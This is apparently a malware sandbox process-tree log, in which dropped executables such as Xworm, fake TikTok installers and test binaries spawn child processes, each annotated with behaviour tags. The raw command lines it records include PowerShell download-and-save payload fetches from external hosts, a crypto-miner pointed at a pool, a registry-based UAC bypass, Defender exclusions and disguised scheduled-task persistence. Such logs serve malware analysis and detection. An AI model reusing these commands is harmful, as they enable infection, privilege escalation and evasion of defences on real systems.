C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:85⤵PID:8704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:15⤵
- Uses browser remote debugging
PID:6868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:15⤵
- Uses browser remote debugging
PID:6688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:25⤵PID:9132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2844 /prefetch:25⤵PID:8160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2080 /prefetch:25⤵PID:5168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2228 /prefetch:15⤵
- Uses browser remote debugging
PID:5888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:15⤵
- Uses browser remote debugging
PID:5692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4296 /prefetch:25⤵PID:7344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2236 /prefetch:25⤵PID:5824
-
-
-
-
C:\Users\Admin\Desktop\a\gvndxfghs.exe"C:\Users\Admin\Desktop\a\gvndxfghs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6212 -
C:\Users\Admin\Desktop\a\gvndxfghs.exeC:\Users\Admin\Desktop\a\gvndxfghs.exe4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:6404
-
-
C:\Users\Admin\Desktop\a\gvndxfghs.exeC:\Users\Admin\Desktop\a\gvndxfghs.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5384
-
-
C:\Users\Admin\Desktop\a\gvndxfghs.exeC:\Users\Admin\Desktop\a\gvndxfghs.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6900
-
-
-
C:\Users\Admin\Desktop\a\random.exe"C:\Users\Admin\Desktop\a\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3036
-
-
C:\Users\Admin\Desktop\a\unik.exe"C:\Users\Admin\Desktop\a\unik.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6796
-
-
C:\Users\Admin\Desktop\a\xblkpfZ8Y4.exe"C:\Users\Admin\Desktop\a\xblkpfZ8Y4.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5208
-
-
C:\Users\Admin\Desktop\a\test28.exe"C:\Users\Admin\Desktop\a\test28.exe"3⤵
- Executes dropped EXE
PID:4488
-
-
C:\Users\Admin\Desktop\a\test26.exe"C:\Users\Admin\Desktop\a\test26.exe"3⤵
- Executes dropped EXE
PID:6084
-
-
C:\Users\Admin\Desktop\a\test27.exe"C:\Users\Admin\Desktop\a\test27.exe"3⤵
- Executes dropped EXE
PID:7164
-
-
C:\Users\Admin\Desktop\a\test29.exe"C:\Users\Admin\Desktop\a\test29.exe"3⤵
- Executes dropped EXE
PID:1456
-
-
C:\Users\Admin\Desktop\a\test25.exe"C:\Users\Admin\Desktop\a\test25.exe"3⤵
- Executes dropped EXE
PID:6804
-
-
C:\Users\Admin\Desktop\a\test24.exe"C:\Users\Admin\Desktop\a\test24.exe"3⤵
- Executes dropped EXE
PID:5976
-
-
C:\Users\Admin\Desktop\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"C:\Users\Admin\Desktop\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:9140
-
-
C:\Users\Admin\Desktop\a\main_v4.exe"C:\Users\Admin\Desktop\a\main_v4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8916 -
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:9184
-
-
-
C:\Users\Admin\Desktop\a\TikTok18.exe"C:\Users\Admin\Desktop\a\TikTok18.exe"3⤵
- Executes dropped EXE
PID:7676 -
C:\Users\Admin\AppData\Local\Temp\e5c3a90\TikTok18.exerun=1 shortcut="C:\Users\Admin\Desktop\a\TikTok18.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c .\TikTok18.bat5⤵PID:9164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:7580
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6624 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=503⤵PID:7276
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6984
-
-
C:\Users\Admin\Desktop\Files\hack1226.exe"C:\Users\Admin\Desktop\Files\hack1226.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6628
-
-
C:\Users\Admin\Desktop\a\main_v4.exe"C:\Users\Admin\Desktop\a\main_v4.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9200 -
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:5564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
PID:8008
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption,Version3⤵
- System Location Discovery: System Language Discovery
PID:6664
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get InstallDate3⤵PID:4456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [CultureInfo]::InstalledUICulture.Name3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5992
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer3⤵
- System Location Discovery: System Language Discovery
PID:9108
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic memorychip get Capacity3⤵PID:9192
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic path win32_videocontroller get Name3⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:3456
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID3⤵
- System Location Discovery: System Language Discovery
PID:6172
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID3⤵
- System Location Discovery: System Language Discovery
PID:3248
-
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:6792
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption,Version3⤵PID:820
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get InstallDate3⤵
- System Location Discovery: System Language Discovery
PID:5580
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [CultureInfo]::InstalledUICulture.Name3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:7060
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer3⤵
- System Location Discovery: System Language Discovery
PID:924
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic memorychip get Capacity3⤵
- System Location Discovery: System Language Discovery
PID:6476
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic path win32_videocontroller get Name3⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:7152
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID3⤵
- System Location Discovery: System Language Discovery
PID:1788
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID3⤵
- System Location Discovery: System Language Discovery
PID:5832
-
-
-
C:\Users\Admin\Desktop\a\random.exe"C:\Users\Admin\Desktop\a\random.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5616 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 15923⤵
- Program crash
PID:7960
-
-
-
C:\Users\Admin\Desktop\a\test24.exe"C:\Users\Admin\Desktop\a\test24.exe"2⤵
- Executes dropped EXE
PID:6836
-
-
C:\Users\Admin\Desktop\a\test25.exe"C:\Users\Admin\Desktop\a\test25.exe"2⤵
- Executes dropped EXE
PID:8740
-
-
C:\Users\Admin\Desktop\a\test26.exe"C:\Users\Admin\Desktop\a\test26.exe"2⤵
- Executes dropped EXE
PID:6600
-
-
C:\Users\Admin\Desktop\a\test27.exe"C:\Users\Admin\Desktop\a\test27.exe"2⤵
- Executes dropped EXE
PID:8764
-
-
C:\Users\Admin\Desktop\a\test28.exe"C:\Users\Admin\Desktop\a\test28.exe"2⤵
- Executes dropped EXE
PID:7272
-
-
C:\Users\Admin\Desktop\a\test29.exe"C:\Users\Admin\Desktop\a\test29.exe"2⤵
- Executes dropped EXE
PID:5588
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:8156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:8996
-
-
C:\Users\Admin\Desktop\a\fHR9z2C.exe"C:\Users\Admin\Desktop\a\fHR9z2C.exe"3⤵
- Executes dropped EXE
PID:8316 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:7764
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:6524
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\3726.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:7448
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\3726.vbs" /f5⤵
- Modifies registry class
PID:4920
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:5568
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:6448
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:5448
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\3726.vbs6⤵PID:8056
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts7⤵PID:8000
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\3726.vbs4⤵PID:1428
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4548
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:7652
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:5964
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:9164
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2599.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:3644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2599.vbs" /f5⤵
- Modifies registry class
PID:3872
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:6760
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:7088
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:5252
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\2599.vbs6⤵PID:9212
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2644
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\2599.vbs4⤵PID:5852
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:8464
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:2952
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:5140
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:7564
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2997.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:6508
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2997.vbs" /f5⤵
- Modifies registry class
PID:5860
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4080
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:5884
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:5528
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\2997.vbs6⤵PID:6440
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:6704
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\2997.vbs4⤵PID:8220
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:8092
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:5444
-
-
-
-
C:\Users\Admin\Desktop\a\AmLzNi.exe"C:\Users\Admin\Desktop\a\AmLzNi.exe"3⤵
- Executes dropped EXE
PID:8852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""4⤵
- Command and Scripting Interpreter: PowerShell
PID:8884
-
-
-
C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe"C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe"3⤵
- Executes dropped EXE
PID:5244
-
-
C:\Users\Admin\Desktop\a\XClient.exe"C:\Users\Admin\Desktop\a\XClient.exe"3⤵
- Executes dropped EXE
PID:7948
-
-
C:\Users\Admin\Desktop\a\VBVEd6f.exe"C:\Users\Admin\Desktop\a\VBVEd6f.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6808 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Appreciate Appreciate.cmd && Appreciate.cmd4⤵PID:8200
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7592
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:4196
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6468
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:4884
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3975065⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Concept + ..\Mix + ..\Trunk + ..\Answers + ..\Bufing + ..\Benefits + ..\Ram + ..\Guides k5⤵
- System Location Discovery: System Language Discovery
PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\397506\Mesa.comMesa.com k5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8356
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:6288
-
-
-
-
C:\Users\Admin\Desktop\a\test12.exe"C:\Users\Admin\Desktop\a\test12.exe"3⤵
- Executes dropped EXE
PID:5328
-
-
C:\Users\Admin\Desktop\a\test6.exe"C:\Users\Admin\Desktop\a\test6.exe"3⤵
- Executes dropped EXE
PID:6464
-
-
C:\Users\Admin\Desktop\a\test14.exe"C:\Users\Admin\Desktop\a\test14.exe"3⤵
- Executes dropped EXE
PID:7912
-
-
C:\Users\Admin\Desktop\a\pantest.exe"C:\Users\Admin\Desktop\a\pantest.exe"3⤵
- Executes dropped EXE
PID:1876
-
-
C:\Users\Admin\Desktop\a\test9.exe"C:\Users\Admin\Desktop\a\test9.exe"3⤵
- Executes dropped EXE
PID:8172
-
-
C:\Users\Admin\Desktop\a\test10-29.exe"C:\Users\Admin\Desktop\a\test10-29.exe"3⤵
- Executes dropped EXE
PID:3056
-
-
C:\Users\Admin\Desktop\a\test19.exe"C:\Users\Admin\Desktop\a\test19.exe"3⤵
- Executes dropped EXE
PID:6096
-
-
C:\Users\Admin\Desktop\a\test10.exe"C:\Users\Admin\Desktop\a\test10.exe"3⤵
- Executes dropped EXE
PID:6256
-
-
C:\Users\Admin\Desktop\a\test_again4.exe"C:\Users\Admin\Desktop\a\test_again4.exe"3⤵
- Executes dropped EXE
PID:5740
-
-
C:\Users\Admin\Desktop\a\test23.exe"C:\Users\Admin\Desktop\a\test23.exe"3⤵PID:7804
-
-
C:\Users\Admin\Desktop\a\test5.exe"C:\Users\Admin\Desktop\a\test5.exe"3⤵PID:7688
-
-
C:\Users\Admin\Desktop\a\test11.exe"C:\Users\Admin\Desktop\a\test11.exe"3⤵PID:7624
-
-
C:\Users\Admin\Desktop\a\test20.exe"C:\Users\Admin\Desktop\a\test20.exe"3⤵PID:5888
-
-
C:\Users\Admin\Desktop\a\test_again3.exe"C:\Users\Admin\Desktop\a\test_again3.exe"3⤵PID:8732
-
-
C:\Users\Admin\Desktop\a\test16.exe"C:\Users\Admin\Desktop\a\test16.exe"3⤵PID:8496
-
-
C:\Users\Admin\Desktop\a\test13.exe"C:\Users\Admin\Desktop\a\test13.exe"3⤵PID:5264
-
-
C:\Users\Admin\Desktop\a\test_again2.exe"C:\Users\Admin\Desktop\a\test_again2.exe"3⤵PID:6448
-
-
C:\Users\Admin\Desktop\a\test15.exe"C:\Users\Admin\Desktop\a\test15.exe"3⤵PID:5424
-
-
C:\Users\Admin\Desktop\a\test18.exe"C:\Users\Admin\Desktop\a\test18.exe"3⤵PID:5932
-
-
C:\Users\Admin\Desktop\a\test21.exe"C:\Users\Admin\Desktop\a\test21.exe"3⤵PID:7216
-
-
C:\Users\Admin\Desktop\a\test22.exe"C:\Users\Admin\Desktop\a\test22.exe"3⤵PID:8728
-
-
C:\Users\Admin\Desktop\a\test8.exe"C:\Users\Admin\Desktop\a\test8.exe"3⤵PID:9212
-
-
C:\Users\Admin\Desktop\a\test7.exe"C:\Users\Admin\Desktop\a\test7.exe"3⤵PID:6208
-
-
C:\Users\Admin\Desktop\a\test-again.exe"C:\Users\Admin\Desktop\a\test-again.exe"3⤵PID:5228
-
-
C:\Users\Admin\Desktop\a\test17.exe"C:\Users\Admin\Desktop\a\test17.exe"3⤵PID:5648
-
-
C:\Users\Admin\Desktop\a\vg9qcBa.exe"C:\Users\Admin\Desktop\a\vg9qcBa.exe"3⤵
- Suspicious use of SetThreadContext
PID:4808 -
C:\Users\Admin\Desktop\a\vg9qcBa.exe"C:\Users\Admin\Desktop\a\vg9qcBa.exe"4⤵PID:8228
-
-
-
C:\Users\Admin\Desktop\a\win.exe"C:\Users\Admin\Desktop\a\win.exe"3⤵
- Adds Run key to start application
PID:2168 -
C:\Windows\SysWOW64\route.exeroute print4⤵PID:2832
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.127.0.14⤵
- Network Service Discovery
PID:2648
-
-
-
C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"3⤵
- Suspicious use of SetThreadContext
PID:5172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:8320
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFDC3.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:8296
-
-
